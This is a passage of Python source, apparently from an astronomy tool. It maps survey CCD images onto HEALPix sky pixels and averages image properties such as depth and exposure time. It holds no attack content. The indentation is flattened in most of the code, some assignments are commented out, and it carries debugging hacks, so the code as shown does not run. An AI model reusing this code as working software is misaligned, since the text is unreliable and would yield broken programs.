jm = int(floor(nside*(0.5 + tt + z*0.75)))#; /*index of descending edge line*/
#ir = nside + 1 + jp - jm#;// ! in {1,2n+1} (ring number counted from z=2/3)
kshift = 0
if fmod(ir,2)==0.:
kshift = 1#;// ! kshift=1 if ir even, 0 otherwise
ip = int(floor( ( jp+jm - nside + kshift + 1 ) / 2 ) + 1)#;// ! in {1,4n}
if ip>nl4:
ip = ip - nl4
ipix1 = ncap + nl4*(ir-1) + ip
else:
tp = tt - floor(tt)#;// !MOD(tt,1.d0)
tmp = sqrt( 3.*(1. - za) )
jp = int(floor( nside * tp * tmp ))#;// ! increasing edge line index
jm = int(floor( nside * (1. - tp) * tmp ))#;// ! decreasing edge line index
#ir = jp + jm + 1#;// ! ring number counted from the closest pole
ip = int(floor( tt * ir ) + 1)#;// ! in {1,4*ir}
if ip>4*ir:
ip = ip - 4*ir
ipix1 = 2*ir*(ir-1) + ip
if z<=0.:
ipix1 = npix - 2*ir*(ir+1) + ip
return ipix1 - 1
# gives the list of Healpix pixels contained in [phi_low, phi_hi]
def in_ring_simp(nside, iz, phi_low, phi_hi, conservative=True):
pixmin = int(ang2pix_ring_ir(nside,iz,phi_low))
pixmax = int(ang2pix_ring_ir(nside,iz,phi_hi))
if pixmax < pixmin:
pixmin1 = pixmax
pixmax = pixmin
pixmin = pixmin1
listir = np.arange(pixmin, pixmax)
return listir
# gives the list of Healpix pixels contained in [phi_low, phi_hi]
def in_ring(nside, iz, phi_low, phi_hi, conservative=True):
# nir is the number of pixels found
# if no pixel is found, on exit nir =0 and result = -1
if phi_hi-phi_low == 0:
return -1
npix = hp.nside2npix(nside)
ncap = 2*nside*(nside-1) # number of pixels in the north polar cap
listir = -1
nir = 0
# identifies ring number
if ((iz >= nside) and (iz <= 3*nside)): # equatorial region
ir = iz - nside + 1 # in {1, 2*nside + 1}
ipix1 = ncap + 4*nside*(ir-1) # lowest pixel number in the ring
ipix2 = ipix1 + 4*nside - 1 # highest pixel number in the ring
kshift = ir % 2
nr = nside*4
else:
if (iz < nside): # north pole
ir = iz
ipix1 = 2*ir*(ir-1) # lowest pixel number in the ring
ipix2 = ipix1 + 4*ir - 1 # highest pixel number in the ring
else: # south pole
ir = 4*nside - iz
ipix1 = npix - 2*ir*(ir+1) # lowest pixel number in the ring
ipix2 = ipix1 + 4*ir - 1 # highest pixel number in the ring
nr = int(ir*4)
kshift = 1
twopi = 2.*np.pi
shift = kshift * .5
if conservative:
# conservative : include every intersected pixels,
# even if pixel CENTER is not in the range [phi_low, phi_hi]
ip_low = round (nr * phi_low / twopi - shift)
ip_hi = round (nr * phi_hi / twopi - shift)
ip_low = ip_low % nr # in {0,nr-1}
ip_hi = ip_hi % nr # in {0,nr-1}
else:
# strict : include only pixels whose CENTER is in [phi_low, phi_hi]
ip_low = np.ceil (nr * phi_low / twopi - shift)
ip_hi = np.floor(nr * phi_hi / twopi - shift)
diff = (ip_low - ip_hi) % nr # in {-nr+1,nr-1}
if (diff < 0):
diff = diff + nr # in {0,nr-1}
if (ip_low >= nr):
ip_low = ip_low - nr
if (ip_hi < 0 ):
ip_hi = ip_hi + nr
#print ip_hi-ip_low,nr
if phi_low <= 0.0 and phi_hi >= 2.0*np.pi:
ip_low = 0
ip_hi = nr - 1
if (ip_low > ip_hi):
to_top = True
else:
to_top = False
ip_low = int( ip_low + ipix1 )
ip_hi = int( ip_hi + ipix1 )
ipix1 = int(ipix1)
if (to_top):
nir1 = int( ipix2 - ip_low + 1 )
nir2 = int( ip_hi - ipix1 + 1 )
nir = int( nir1 + nir2 )
if ((nir1 > 0) and (nir2 > 0)):
listir = np.concatenate( (np.arange(ipix1, nir2+ipix1), np.arange(ip_low, nir1+ip_low) ) )
else:
if nir1 == 0:
listir = np.arange(ipix1, nir2+ipix1)
if nir2 == 0:
listir = np.arange(ip_low, nir1+ip_low)
else:
nir = int(ip_hi - ip_low + 1 )
listir = np.arange(ip_low, nir+ip_low)
#below added by AJR to address region around ra = 360
if float(listir[-1]-listir[0])/(ipix2-ipix1) > .5:
listir1 = np.arange(ipix1, listir[0]+1)
listir2 = np.arange(listir[-1], ipix2+1)
# #print listir[-1],listir[0],ipix1,ipix2,len(listir1),len(listir2)
listir = np.concatenate( (listir1,listir2 ) )
#print len(listir)
return listir
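
# Hedged usage sketch for in_ring: list the RING-scheme pixels whose
# centres fall in a phi interval on the equatorial ring. nside and the
# interval are arbitrary assumptions for illustration.
def _example_in_ring():
    nside = 16
    iz = 2 * nside                                   # equatorial ring index
    pixels = np.int64(in_ring(nside, iz, 0.0, np.pi / 2, conservative=False))
    return pixels                                    # one quarter of the ring's 4*nside pixels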
# ---------------------------------------------------------------------------------------- #
# Linear interpolation
def lininterp(xval, xA, yA, xB, yB):
slope = (yB-yA) / (xB-xA)
yval = yA + slope * (xval - xA)
return yval
# ---------------------------------------------------------------------------------------- #
# Test if val belongs to the interval [b1, b2]
def inInter(val, b1, b2):
if b1 <= b2:
return np.logical_and( val <= b2, val >= b1 )
else:
return np.logical_and( val <= b1, val >= b2 )
# ---------------------------------------------------------------------------------------- #
# Test if a list of (theta,phi) values belongs to a region defined by its corners (theta,phi) for Left, Right, Bottom, Upper
def in_region(thetavals, phivals, thetaU, phiU, thetaR, phiR, thetaL, phiL, thetaB, phiB):
npts = len(thetavals)
phis = np.ndarray( (npts, 4) )
thetas = np.ndarray( (npts, 4) )
inds_phi = np.ndarray( (npts, 4), dtype=bool )
inds_phi[:,:] = False
inds_theta = np.ndarray( (npts, 4), dtype=bool )
inds_theta[:,:] = False
if thetaU != thetaB:
phis[:,0] = lininterp(thetavals, thetaB, phiB, thetaU, phiU)
inds_phi[:,0] = inInter(thetavals, thetaB, thetaU)
if thetaL != thetaU:
phis[:,1] = lininterp(thetavals, thetaU, phiU, thetaL, phiL)
inds_phi[:,1] = inInter(thetavals, thetaU, thetaL)
inds_phi[phis[:,0]==phis[:,1],1] = False
if thetaL != thetaR:
phis[:,2] = lininterp(thetavals, thetaL, phiL, thetaR, phiR)
inds_phi[:,2] = inInter(thetavals, thetaL, thetaR)
inds_phi[phis[:,0]==phis[:,2],2] = False
inds_phi[phis[:,1]==phis[:,2],2] = False
if thetaR != thetaB:
phis[:,3] = lininterp(thetavals, thetaR, phiR, thetaB, phiB)
inds_phi[:,3] = inInter(thetavals, thetaR, thetaB)
inds_phi[phis[:,0]==phis[:,3],3] = False
inds_phi[phis[:,1]==phis[:,3],3] = False
inds_phi[phis[:,2]==phis[:,3],3] = False
if phiU != phiB:
thetas[:,0] = lininterp(phivals, phiB, thetaB, phiU, thetaU)
inds_theta[:,0] = inInter(phivals, phiB, phiU)
if phiL != phiU:
thetas[:,1] = lininterp(phivals, phiU, thetaU, phiL, thetaL)
inds_theta[:,1] = inInter(phivals, phiU, phiL)
inds_theta[thetas[:,0]==thetas[:,1],1] = False
if phiL != phiR:
thetas[:,2] = lininterp(phivals, phiL, thetaL, phiR, thetaR)
inds_theta[:,2] = inInter(phivals, phiL, phiR)
inds_theta[thetas[:,0]==thetas[:,2],2] = False
inds_theta[thetas[:,1]==thetas[:,2],2] = False
if phiR != phiB:
thetas[:,3] = lininterp(phivals, phiR, thetaR, phiB, thetaB)
inds_theta[:,3] = inInter(phivals, phiR, phiB)
inds_theta[thetas[:,0]==thetas[:,3],3] = False
inds_theta[thetas[:,1]==thetas[:,3],3] = False
inds_theta[thetas[:,2]==thetas[:,3],3] = False
ind = np.where(np.logical_and(inds_phi[:,:].sum(axis=1)>1, inds_theta[:,:].sum(axis=1)>1))[0]
res = np.ndarray( (npts, ), dtype=bool )
res[:] = False
for i in ind:
phival = phivals[i]
thetaval = thetavals[i]
phis_loc = phis[i,inds_phi[i,:]]
thetas_loc = thetas[i,inds_theta[i,:]]
res[i] = (phival >= phis_loc[0]) & (phival <= phis_loc[1]) & (thetaval >= thetas_loc[0]) & (thetaval <= thetas_loc[1])
return res
# ---------------------------------------------------------------------------------------- #
# Computes healpix pixels of propertyArray.
# pixoffset is the number of pixels to truncate on the edges of each ccd image.
# ratiores is the super-resolution factor, i.e. the edges of each ccd image are processed
# at resolution 4*nside and then averaged at resolution nside.
#def computeHPXpix_sequ_new(nside, propertyArray, pixoffset=0, ratiores=4, coadd_cut=True):
def computeHPXpix_sequ_new(nside, propertyArray, pixoffset=0, ratiores=4, coadd_cut=False):
#return 'ERROR'
#img_ras, img_decs = [propertyArray[v] for v in ['ra0', 'ra1', 'ra2','ra3']],[propertyArray[v] for v in ['dec0', 'dec1', 'dec2','dec3']]
#x = [1+pixoffset, propertyArray['NAXIS1']-pixoffset, propertyArray['NAXIS1']-pixoffset, 1+pixoffset, 1+pixoffset]
#y = [1+pixoffset, 1+pixoffset, propertyArray['NAXIS2']-pixoffset, propertyArray['NAXIS2']-pixoffset, 1+pixoffset]
#if np.any(img_ras > 360.0):
# img_ras[img_ras > 360.0] -= 360.0
#if np.any(img_ras < 0.0):
# img_ras[img_ras < 0.0] += 360.0
#print 'in here'
#print len(img_ras)#,len(img_ras[0])
#plt.plot(img_ras[0],img_decs[0],'k,')
#plt.show()
img_ras, img_decs = computeCorners_WCS_TPV(propertyArray, pixoffset)
#DEBUGGING - MARCM
#print "debugging img_ras img_decs", img_ras
#for i in range(0,len(img_ras)):
# if img_ras[i] > 360.:
# img_ras[i] -= 360.
# if img_ras[i] < 0.:
# img_ras[i] += 360.
#END DEBUGGING MARCM BIT
# Coordinates of coadd corners
# RALL, t.DECLL, t.RAUL, t.DECUL, t.RAUR, t.DECUR, t.RALR, t.DECLR, t.URALL, t.UDECLL, t.URAUR, t.UDECUR
if coadd_cut:
#coadd_ras = [propertyArray[v] for v in ['URAUL', 'URALL', 'URALR', 'URAUR']]
#coadd_decs = [propertyArray[v] for v in ['UDECUL', 'UDECLL', 'UDECLR', 'UDECUR']]
coadd_ras = [propertyArray[v] for v in ['ra0', 'ra1', 'ra2', 'ra3']]
coadd_decs = [propertyArray[v] for v in ['dec0', 'dec1', 'dec2', 'dec3']]
coadd_phis = np.multiply(coadd_ras, np.pi/180)
coadd_thetas = np.pi/2 - np.multiply(coadd_decs, np.pi/180)
else:
coadd_phis = 0.0
coadd_thetas = 0.0
# Coordinates of image corners
#print img_ras
img_phis = np.multiply(img_ras , np.pi/180)
img_thetas = np.pi/2 - np.multiply(img_decs , np.pi/180)
img_pix = hp.ang2pix(nside, img_thetas, img_phis, nest=False)
pix_thetas, pix_phis = hp.pix2ang(nside, img_pix, nest=False)
# DEBUGGING - MARCM
#print 'pix_thetas', pix_thetas
#print 'pix_phis', pix_phis
#sys.exit()
#img_phis = np.mod( img_phis + np.pi, 2*np.pi ) # Enable these two lines to rotate everything by 180 degrees
#coadd_phis = np.mod( coadd_phis + np.pi, 2*np.pi ) # Enable these two lines to rotate everything by 180 degrees
    # MARCM patch to correct a bug from Boris which didn't get BASS and MzLS CCD corners properly oriented.
    # This patch is not necessarily comprehensive; the corner pairing may not cover all cases.
    # In addition, what happens around phi=0 still needs checking.
dph01=abs(img_phis[0]-img_phis[1])
dph12=abs(img_phis[1]-img_phis[2])
if (dph01 < dph12) :
if (img_phis[1] < img_phis[2]):
if(img_thetas[0] < img_thetas[1]):
# this was original bit
#print "This is DECaLS"
ind_U = 0
ind_L = 2
ind_R = 3
ind_B = 1
else:
# This is for MzLS (seems to rotate other way)
#print "This is MzLS"
ind_U = 1
ind_L = 3
ind_R = 2
ind_B = 0
# print "Probably wrong indexing of ccd corner AAA"
else:
# This is addes for BASS
#print "This is for BASS"
if(img_thetas[0] > img_thetas[1]):
ind_U = 2
ind_L = 0
ind_R = 1
ind_B = 3
else:
            # A few O(100) CCDs of DECaLS z-band fall here; not clear what to do with them
#ind_U = 3
#ind_L = 1
#ind_R = 0
#ind_B = 2
ind_U = 0
ind_L = 2
ind_R = 3
ind_B = 1
else:
print("WARNING: (MARCM:) Current ccd image may have wrong corner assignments in quicksip")
#raise ValueError("(MARCM:) probably wrong assignment of corner values in quicksip")
#ind_U = 0
#ind_L = 2
#ind_R = 3
#ind_B = 1
ind_U = 3
ind_L = 1
ind_R = 0
ind_B = 2
ipix_list = np.zeros(0, dtype=int)
weight_list = np.zeros(0, dtype=float)
# loop over rings until reached bottom
iring_U = ring_num(nside, np.cos(img_thetas.min()), shift=0)
iring_B = ring_num(nside, np.cos(img_thetas.max()), shift=0)
ipixs_ring = []
pmax = np.max(img_phis)
pmin = np.min(img_phis)
if (pmax - pmin > np.pi):
ipixs_ring = np.int64(np.concatenate([in_ring(nside, iring, pmax, pmin, conservative=True) for iring in range(iring_U-1, iring_B+1)]))
else:
ipixs_ring = np.int64(np.concatenate([in_ring(nside, iring, pmin, pmax, conservative=True) for iring in range(iring_U-1, iring_B+1)]))
ipixs_nest = hp.ring2nest(nside, ipixs_ring)
npixtot = hp.nside2npix(nside)
if ratiores > 1:
subipixs_nest = np.concatenate([np.arange(ipix*ratiores**2, ipix*ratiores**2+ratiores**2, dtype=np.int64) for ipix in ipixs_nest])
nsubpixperpix = ratiores**2
else:
subipixs_nest = ipixs_nest
nsubpixperpix = 1
rangepix_thetas, rangepix_phis = hp.pix2ang(nside*ratiores, subipixs_nest, nest=True)
#subipixs_ring = hp.ang2pix(nside*ratiores, rangepix_thetas, rangepix_phis, nest=False).reshape(-1, nsubpixperpix)
if (pmax - pmin > np.pi) or (np.max(coadd_phis) - np.min(coadd_phis) > np.pi):
#DEBUGGING - MARCM
#print "Eps debugging"
img_phis= np.mod( img_phis + np.pi, 2*np.pi )
coadd_phis= np.mod( coadd_phis + np.pi, 2*np.pi )
rangepix_phis = np.mod( rangepix_phis + np.pi, 2*np.pi )
subweights = in_region(rangepix_thetas, rangepix_phis,
img_thetas[ind_U], img_phis[ind_U], img_thetas[ind_L], img_phis[ind_L],
img_thetas[ind_R], img_phis[ind_R], img_thetas[ind_B], img_phis[ind_B])
# DEBUGGING - MARCM
#print 'pmax pmin', pmax, pmin
#print 'img_thetas again', img_thetas
#print 'img_phis again', img_phis
#print 'rangepix_phis', rangepix_phis
#print 'rangepix_theta', rangepix_thetas
#print 'subweights', subweights
if coadd_cut:
subweights_coadd = in_region(rangepix_thetas, rangepix_phis,
coadd_thetas[ind_U], coadd_phis[ind_U], coadd_thetas[ind_L], coadd_phis[ind_L],
coadd_thetas[ind_R], coadd_phis[ind_R], coadd_thetas[ind_B], coadd_phis[ind_B])
resubweights = np.logical_and(subweights, subweights_coadd).reshape(-1, nsubpixperpix)
else:
resubweights = subweights.reshape(-1, nsubpixperpix)
sweights = resubweights.sum(axis=1) / float(nsubpixperpix)
ind = (sweights > 0.0)
# DEBUGGING - MARCM
#print 'ind', ind
#print 'ipixs_ring', ipixs_ring
return ipixs_ring[ind], sweights[ind], img_thetas, img_phis, resubweights[ind,:]
def computeHPXpix_sequ_new_simp(nside, propertyArray):
#return 'ERROR'
#Hack by AJR and MarcM, just return all of the pixel centers within the ra,dec range
img_ras, img_decs = [propertyArray[v] for v in ['ra0', 'ra1', 'ra2','ra3']],[propertyArray[v] for v in ['dec0', 'dec1', 'dec2','dec3']]
#print min(img_ras),max(img_ras)
#more efficient version below failed for some reason
#iweird = 0
for i in range(0,len(img_ras)):
if img_ras[i] > 360.:
img_ras[i] -= 360.
if img_ras[i] < 0.:
img_ras[i] += 360.
#if max(img_ras) - min(img_ras) > 1.:
# print img_ras,img_decs
#if np.any(img_ras > 360.0):
# img_ras[img_ras > 360.0] -= 360.0
#if np.any(img_ras < 0.0):
# img_ras[img_ras < 0.0] += 360.0
# Coordinates of image corners
#print img_ras
img_phis = np.multiply(img_ras , np.pi/180.)
img_thetas = np.pi/2. - np.multiply(img_decs , np.pi/180.)
img_pix = hp.ang2pix(nside, img_thetas, img_phis, nest=False)
pix_thetas, pix_phis = hp.pix2ang(nside, img_pix, nest=False)
ipix_list = np.zeros(0, dtype=int)
# loop over rings until reached bottom
iring_U = ring_num(nside, np.cos(img_thetas.min()), shift=0)
iring_B = ring_num(nside, np.cos(img_thetas.max()), shift=0)
ipixs_ring = []
pmax = np.max(img_phis)
pmin = np.min(img_phis)
if pmax-pmin == 0:
return []
p1 = pmin
p2 = pmax
if pmin < .1 and pmax > 1.9*np.pi:
#straddling line
#img_phis.sort()
for i in range(0,len(img_phis)):
if img_phis[i] > p1 and img_phis[i] < np.pi:
p1 = img_phis[i]
if img_phis[i] < p2 and img_phis[i] > np.pi:
p2 = img_phis[i]
#print 'kaka', img_phis, img_ras
#print 'kaka', p1, p2, iring_U, iring_B
ipixs_ring1 = np.int64(np.concatenate([in_ring(nside, iring, 0, p1, conservative=False) for iring in range(iring_U, iring_B+1)]))
ipixs_ring2 = np.int64(np.concatenate([in_ring(nside, iring, p2, 2.*np.pi, conservative=False) for iring in range(iring_U, iring_B+1)]))
#ipixs_ring1 = np.int64(np.concatenate([in_ring_simp(nside, iring, 0, p1, conservative=False) for iring in range(iring_U, iring_B+1)]))
#ipixs_ring2 = np.int64(np.concatenate([in_ring_simp(nside, iring, p2, 2.*np.pi, conservative=False) for iring in range(iring_U, iring_B+1)]))
ipixs_ring = np.concatenate((ipixs_ring1,ipixs_ring2))
# print len(ipixs_ring),len(ipixs_ring1),len(ipixs_ring2),iring_B-iring_U,pmin,pmax,p1,p2
#
        if len(ipixs_ring1) > 1000:
            print( 'warning: unexpectedly many pixels in first ring segment:', p1, iring_U, iring_B)
        if len(ipixs_ring2) > 1000:
            print( 'warning: unexpectedly many pixels in second ring segment:', p2, iring_U, iring_B)
else:
ipixs_ring = np.int64(np.concatenate([in_ring(nside, iring, p1, p2, conservative=False) for iring in range(iring_U, iring_B+1)]))
#ipixs_ring = np.int64(np.concatenate([in_ring_simp(nside, iring, p1, p2, conservative=False) for iring in range(iring_U, iring_B+1)]))
if len(ipixs_ring) > 1000:
#print 'hey', img_ras,img_decs
print( 'careful', len(ipixs_ring),iring_B-iring_U,pmin,pmax,p1,p2)
#nwrong = nwrong +1
return [] #temporary fix
# print len(ipixs_ring),iring_B-iring_U,pmin,pmax,min(img_ras),max(img_ras)
#print len(ipixs_ring),iring_B-iring_U,pmin,pmax,min(img_ras),max(img_ras)
return ipixs_ring
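
# Hedged sketch driving the simplified projector with a hand-made CCD
# record. The corner coordinates below are assumptions standing in for a
# row of the survey table; any dict-like object with these keys works.
def _example_computeHPXpix_simp():
    ccd = {'ra0': 30.00, 'ra1': 30.25, 'ra2': 30.25, 'ra3': 30.00,
           'dec0': -10.00, 'dec1': -10.00, 'dec2': -10.15, 'dec3': -10.15}
    return computeHPXpix_sequ_new_simp(1024, ccd)    # RING pixel indices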
# ---------------------------------------------------------------------------------------- #
# Crucial routine: reads the properties of a CCD image and returns its corners in RA/Dec.
# pixoffset is the number of pixels to truncate on the edges of each ccd image.
def computeCorners_WCS_TPV(propertyArray, pixoffset):
#x = [1+pixoffset, propertyArray['NAXIS1']-pixoffset, propertyArray['NAXIS1']-pixoffset, 1+pixoffset, 1+pixoffset]
#y = [1+pixoffset, 1+pixoffset, propertyArray['NAXIS2']-pixoffset, propertyArray['NAXIS2']-pixoffset, 1+pixoffset]
x = [1+pixoffset, propertyArray['width']-pixoffset, propertyArray['width']-pixoffset, 1+pixoffset, 1+pixoffset]
y = [1+pixoffset, 1+pixoffset, propertyArray['height']-pixoffset, propertyArray['height']-pixoffset, 1+pixoffset]
#ras, decs = xy2radec(x, y, propertyArray)
ras, decs = xy2radec_nopv(x, y, propertyArray)
return ras, decs
# ---------------------------------------------------------------------------------------- #
# Performs WCS inverse projection to obtain ra dec from ccd image information.
def xy2radec(x, y, propertyArray):
crpix = np.array( [ propertyArray['CRPIX1'], propertyArray['CRPIX2'] ] )
cd = np.array( [ [ propertyArray['CD1_1'], propertyArray['CD1_2'] ],
[ propertyArray['CD2_1'], propertyArray['CD2_2'] ] ] )
pv1 = [ float(propertyArray['PV1_'+str(k)]) for k in range(11) if k != 3 ] # if k != 3
pv2 = [ float(propertyArray['PV2_'+str(k)]) for k in range(11) if k != 3 ] # if k != 3
pv = np.array( [ [ [ pv1[0], pv1[2], pv1[5], pv1[9] ],
[ pv1[1], pv1[4], pv1[8], 0. ],
[ pv1[3], pv1[7], 0. , 0. ],
[ pv1[6], 0. , 0. , 0. ] ],
[ [ pv2[0], pv2[1], pv2[3], pv2[6] ],
[ pv2[2], pv2[4], pv2[7], 0. ],
[ pv2[5], pv2[8], 0. , 0. ],
[ pv2[9], 0. , 0. , 0. ] ] ] )
center_ra = propertyArray['CRVAL1'] * np.pi / 180.0
center_dec = propertyArray['CRVAL2'] * np.pi / 180.0
ras, decs = radec_gnom(x, y, center_ra, center_dec, cd, crpix, pv)
ras = np.multiply( ras, 180.0 / np.pi )
decs = np.multiply( decs, 180.0 / np.pi )
if np.any(ras > 360.0):
ras[ras > 360.0] -= 360.0
if np.any(ras < 0.0):
ras[ras < 0.0] += 360.0
return ras, decs
def xy2radec_nopv(x, y, propertyArray):
crpix = np.array( [ propertyArray['crpix1'], propertyArray['crpix2'] ] )
cd = np.array( [ [ propertyArray['cd1_1'], propertyArray['cd1_2'] ],
[ propertyArray['cd2_1'], propertyArray['cd2_2'] ] ] )
center_ra = propertyArray['crval1'] * np.pi / 180.0
center_dec = propertyArray['crval2'] * np.pi / 180.0
ras, decs = radec_gnom(x, y, center_ra, center_dec, cd, crpix, pv=False)
ras = np.multiply( ras, 180.0 / np.pi )
decs = np.multiply( decs, 180.0 / np.pi )
if np.any(ras > 360.0):
ras[ras > 360.0] -= 360.0
if np.any(ras < 0.0):
ras[ras < 0.0] += 360.0
return ras, decs
# ---------------------------------------------------------------------------------------- #
# Deproject into ra dec values
def deproject_gnom(u, v, center_ra, center_dec):
u *= arcsec_to_radians
v *= arcsec_to_radians
rsq = u*u + v*v
cosc = sinc_over_r = 1./np.sqrt(1.+rsq)
cosdec = np.cos(center_dec)
sindec = np.sin(center_dec)
sindec = cosc * sindec + v * sinc_over_r * cosdec
tandra_num = -u * sinc_over_r
tandra_denom = cosc * cosdec - v * sinc_over_r * sindec
dec = np.arcsin(sindec)
ra = center_ra + np.arctan2(tandra_num, tandra_denom)
return ra, dec
# ---------------------------------------------------------------------------------------- #
def radec_gnom(x, y, center_ra, center_dec, cd, crpix, pv):
p1 = np.array( [ np.atleast_1d(x), np.atleast_1d(y) ] )
p2 = np.dot(cd, p1 - crpix[:,np.newaxis])
u = p2[0]
v = p2[1]
if pv:
usq = u*u
vsq = v*v
ones = np.ones(u.shape)
upow = np.array([ ones, u, usq, usq*u ])
vpow = np.array([ ones, v, vsq, vsq*v ])
temp = np.dot(pv, vpow)
p2 = np.sum(upow * temp, axis=1)
u = - p2[0] * degree_to_arcsec
v = p2[1] * degree_to_arcsec
else:
u = -u * degree_to_arcsec
v = v * degree_to_arcsec
ra, dec = deproject_gnom(u, v, center_ra, center_dec)
return ra, dec
# ---------------------------------------------------------------------------------------- #
# Class for a pixel of the map, containing trees of images and values
class NDpix_simp:
def __init__(self, propertyArray_in):
self.nbelem = 1
self.ratiores = 1
self.propertyArray = [propertyArray_in]
def addElem(self, propertyArray_in):
self.nbelem += 1
self.propertyArray.append(propertyArray_in)
# Project NDpix into a single number
# for a given property and operation applied to its array of images
def project(self, property, weights, operation):
asperpix = 0.263
A = np.pi*(1.0/asperpix)**2
pis = np.array([1.0 for proparr in self.propertyArray])
# No super-resolution or averaging
vals = np.array([proparr[property] for proparr in self.propertyArray])
if operation == 'mean':
return np.mean(vals)
if operation == 'median':
return np.median(vals)
if operation == 'total':
return np.sum(vals)
if operation == 'min':
return np.min(vals)
if operation == 'max':
return np.max(vals)
if operation == 'maxmin':
return np.max(vals) - np.min(vals)
if operation == 'fracdet':
return 1.0
if operation == 'num':
return len(vals)
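
# Hedged illustration of the accumulate-then-project pattern: a pixel
# absorbs the CCD records that touch it, and a map value is obtained by
# reducing one property. The 'EXPTIME' field name is an assumption
# standing in for any column of the input table.
def _example_ndpix_simp():
    pix = NDpix_simp({'EXPTIME': 30.0})
    pix.addElem({'EXPTIME': 90.0})
    assert pix.project('EXPTIME', None, 'mean') == 60.0
    assert pix.project('EXPTIME', None, 'num') == 2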
# Class for a pixel of the map, containing trees of images and values
class NDpix:
def __init__(self, propertyArray_in, inweights, ratiores):
self.ratiores = ratiores
self.nbelem = 1
self.propertyArray = [propertyArray_in]
if self.ratiores > 1:
self.weights = np.array([inweights])
def addElem(self, propertyArray_in, inweights):
self.nbelem += 1
self.propertyArray.append(propertyArray_in)
if self.ratiores > 1:
self.weights = np.vstack( (self.weights, inweights) )
# Project NDpix into a single number
# for a given property and operation applied to its array of images
def project(self, property, weights, operation):
asperpix = 0.263
A = np.pi*(1.0/asperpix)**2
# Computes COADD weights
if weights == 'coaddweights3' or weights == 'coaddweights2' or weights == 'coaddweights' or property == 'maglimit2' or property == 'maglimit' or property == 'maglimit3' or property == 'sigmatot':
m_zpi = np.array([proparr['MAGZP'] for proparr in self.propertyArray])
if property == 'sigmatot':
m_zp = np.array([30.0 for proparr in self.propertyArray])
else:
m_zp = np.array([proparr['COADD_MAGZP'] for proparr in self.propertyArray])
if weights == 'coaddweights' or property == 'maglimit':
sigma_bgi = np.array([
1.0/np.sqrt((proparr['WEIGHTA']+proparr['WEIGHTB'])/2.0)
if (proparr['WEIGHTA']+proparr['WEIGHTB']) >= 0.0 else proparr['SKYSIGMA']
for proparr in self.propertyArray])
if weights == 'coaddweights2' or property == 'maglimit2':
sigma_bgi = np.array([
0.5/np.sqrt(proparr['WEIGHTA'])+0.5/np.sqrt(proparr['WEIGHTB'])
if (proparr['WEIGHTA']+proparr['WEIGHTB']) >= 0.0 else proparr['SKYSIGMA']
for proparr in self.propertyArray])
if weights == 'coaddweights3' or property == 'maglimit3' or property == 'sigmatot':
sigma_bgi = np.array([proparr['SKYSIGMA'] for proparr in self.propertyArray])
sigpis = 100**((m_zpi-m_zp)/5.0)
mspis = (sigpis/sigma_bgi)**2.0
pis = (sigpis/sigma_bgi)**2.0
elif weights == 'invsqrtexptime':
pis = np.array([ 1.0 / np.sqrt(proparr['EXPTIME']) for proparr in self.propertyArray])
else:
pis = np.array([1.0 for proparr in self.propertyArray])
pis = np.divide(pis, pis.mean())
# No super-resolution or averaging
if self.ratiores == 1:
if property == 'count':
vals = np.array([1.0 for proparr in self.propertyArray])
elif property == 'sigmatot':
return np.sqrt(1.0 / mspis.sum())
elif property == 'maglimit3' or property == 'maglimit2' or property == 'maglimit':
sigma2_tot = 1.0 / mspis.sum()
return np.mean(m_zp) - 2.5*np.log10(10*np.sqrt(A*sigma2_tot) )
else:
vals = np.array([proparr[property] for proparr in self.propertyArray])
vals = vals * pis
if operation == 'mean':
return np.mean(vals)
if operation == 'median':
return np.median(vals)
if operation == 'total':
return np.sum(vals)
if operation == 'min':
return np.min(vals)
if operation == 'max':
return np.max(vals)
if operation == 'maxmin':
return np.max(vals) - np.min(vals)
if operation == 'fracdet':
return 1.0
if operation == 'num':
return len(vals)
# Retrieve property array and apply operation (with super-resolution)
if property == 'count':
vals = np.array([1.0 for proparr in self.propertyArray])
elif property == 'maglimit2' or property == 'maglimit' or property == 'maglimit3' or property == 'sigmatot':
vals = (sigpis/sigma_bgi)**2
else:
#print property
vals = np.array([proparr[property] for proparr in self.propertyArray])
vals = vals * pis
theweights = self.weights
weightedarray = (theweights.T * vals).T
counts = (theweights.T * pis).sum(axis=1)
ind = counts > 0
if property == 'maglimit' or property == 'maglimit2' or property == 'maglimit3':
sigma2_tot = 1.0 / weightedarray.sum(axis=0)
maglims = np.mean(m_zp) - 2.5*np.log10(10*np.sqrt(A*sigma2_tot) )
return maglims[ind].mean()
if property == 'sigmatot':
sigma2_tot = 1.0 / weightedarray.sum(axis=0)
return np.sqrt(sigma2_tot)[ind].mean()
if operation == 'min':
return np.min(vals)
if operation == 'max':
return np.max(vals)
if operation == 'maxmin':
return np.max(vals) - np.min(vals)
if operation == 'mean':
return (weightedarray.sum(axis=0) / counts)[ind].mean()
if operation == 'median':
return np.ma.median(np.ma.array(weightedarray, mask=np.logical_not(theweights)), axis=0)[ind].mean()
if operation == 'total':
return weightedarray.sum(axis=0)[ind].mean()
if operation == 'fracdet':
temp = weightedarray.sum(axis=0)
return temp[ind].size / float(temp.size)
if operation == 'num':
return len(vals)
# ---------------------------------------------------------------------------------------- #
# Project NDpix into a value
def projectNDpix(args):
pix, property, weights, operation = args
if pix != 0:
        return pix.project(property, weights, operation)
else:
return hp.UNSEEN
# Create a "healtree", i.e. a set of pixels with trees of images in them.
def makeHealTree(args):
samplename, nside, ratiores, pixoffset, tbdata = args
treemap = HealTree(nside)
verbcount = 1000
count = 0
start = time.time()
duration = 0
if(verbose): print( '>', samplename, ': starting tree making')
for i, propertyArray in enumerate(tbdata):
count += 1
start_one = time.time()
# DEBUGGING - MARCM
#print "debugging i ", i
treemap.addElem(propertyArray, ratiores, pixoffset)
end_one = time.time()
duration += float(end_one - start_one)
if count == verbcount:
if(verbose): print( '>', samplename, ': processed images', i-verbcount+1, '-', i+1, '(on '+str(len(tbdata))+') in %.2f' % duration, 'sec (~ %.3f' % (duration/float(verbcount)), 'per image)')
count = 0
duration = 0
end = time.time()
if(verbose): print('>', samplename, ': tree making took : %.2f' % float(end - start), 'sec for', len(tbdata), 'images')
return treemap
def makeHealTree_simp(args):
#hack by AJR
samplename, nside, tbdata = args
treemap = HealTree(nside)
verbcount = 1000
count = 0
start = time.time()
duration = 0
if(verbose): print( '>', samplename, ': starting tree making')
for i, propertyArray in enumerate(tbdata):
count += 1
start_one = time.time()
treemap.addElem_simp(propertyArray)
end_one = time.time()
duration += float(end_one - start_one)
if count == verbcount:
if(verbose): print( '>', samplename, ': processed images', i-verbcount+1, '-', i+1, '(on '+str(len(tbdata))+') in %.2f' % duration, 'sec (~ %.3f' % (duration/float(verbcount)), 'per image)')
